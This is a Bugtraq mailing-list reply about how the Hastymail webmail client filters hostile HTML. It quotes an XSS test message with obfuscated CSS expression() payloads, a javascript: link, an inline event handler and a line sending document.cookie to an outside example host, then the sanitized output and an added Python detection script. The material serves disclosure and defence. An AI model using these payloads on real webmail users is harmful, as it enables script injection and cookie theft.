Bugtraq mailing list archives
Re: Webmails + Internet Explorer can create unwanted javascript execution
From: "Jason Munro" <jason () stdbev com>
Date: Fri, 3 Oct 2003 11:56:47 -0500
On October 2, 4:39 pm Jedi/Sector One <j () pureftpd org> wrote:

FWIW, Hastymail (a lesser known webmail IMAP client written in PHP I'm working on) does filter out this nastiness.

HTML before:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>Webmail test</title>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:expres\sion(alert(1))">
<style type="text/css">
h1 {
he\ight:e\xpression(alert(2));
bac\kground-image:e\xpression('url(http://example.org/'+document.c ookie+$
}
</style>
<h1 style="width:expression(alert(3))">...</h1>
<div id="just-for-fun">
<a href="javascript:window.open(document.location);" onmouseover="alert(4)">fireworks</a>
</div>
</body>
</html>

HTML after:

<!-- begin sanitized html -->
<h1 style="width:idiocy(alert(3))">...</h1>
<div id="just-for-fun">
<a>fireworks</a>
</div>
<!-- end sanitized html -->

The default filter settings do not allow HTML hyperlinks, but this can be adjusted by the user, producing this output for the 'fireworks' link instead:

<a href="blah:window.open(document.location);" target="_new">fireworks</a>

Hastymail uses the PHP HTML filter written by Konstantin Riabitsev found here:

http://www.mricon.com/html/phpfilter.html

The filter parameters are set very tightly to avoid this kind of issue. While SquirrelMail's filter is based on the same engine, apparently either it's not up to date or the params are not set as tight.

\_____ Jason Munro ________________________
\_____ jason () stdbev com ___________________
\_____ #hastymail at irc.freenode.net _____
\_____ http://hastymail.sourceforge.net ___
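
An added example, not part of the original message and not code from Hastymail or the PHP filter it uses: a small Python audit that decodes CSS backslash escapes before looking for `expression(`, so obfuscated forms like those in the test message are caught alongside `javascript:` URLs and inline event handlers. The names `css_unescape`, `css_is_unsafe`, `Auditor` and `audit` are illustrative, and `SAMPLE` is constructed from the test HTML above.

```python
import re
from html.parser import HTMLParser

# CSS escapes: backslash + 1-6 hex digits, or backslash + any other character (itself).
_ESC = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|([^\r\n\f]))")
_BAD_CSS = re.compile(r"expression\s*\(", re.I)
_BAD_URL = re.compile(r"^\s*javascript\s*:", re.I)

def css_unescape(text):
    def repl(m):
        if m.group(2) is not None:
            return m.group(2)
        cp = int(m.group(1), 16)
        return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
    return _ESC.sub(repl, text)

def css_is_unsafe(css):
    # Match on the decoded text so 'e\xpression' is seen as 'expression'.
    return bool(_BAD_CSS.search(css_unescape(css)))

class Auditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._css = [], None
    def handle_starttag(self, tag, attrs):
        self._css = [] if tag == "style" else None
        for name, value in attrs:
            value = value or ""
            if (name == "style" and css_is_unsafe(value)
                    or name.startswith("on")  # inline event handler
                    or name in ("href", "src") and _BAD_URL.search(value)):
                self.findings.append((tag, name))
    def handle_data(self, data):
        if self._css is not None:
            self._css.append(data)  # buffer <style> text until its end tag
    def handle_endtag(self, tag):
        if tag == "style" and self._css is not None and css_is_unsafe("".join(self._css)):
            self.findings.append(("style", "#text"))
        self._css = None

def audit(html):
    auditor = Auditor()
    auditor.feed(html)
    return auditor.findings

# Constructed sample, shortened from the test message quoted above.
SAMPLE = r'''<body style="width:expres\sion(alert(1))">
<style type="text/css">h1 { he\ight:e\xpression(alert(2)); }</style>
<h1 style="width:expression(alert(3))">...</h1>
<a href="javascript:window.open(document.location);" onmouseover="alert(4)">fireworks</a>'''
```

`audit(SAMPLE)` returns one `(tag, attribute)` pair per finding, with `("style", "#text")` marking the contents of a `<style>` block.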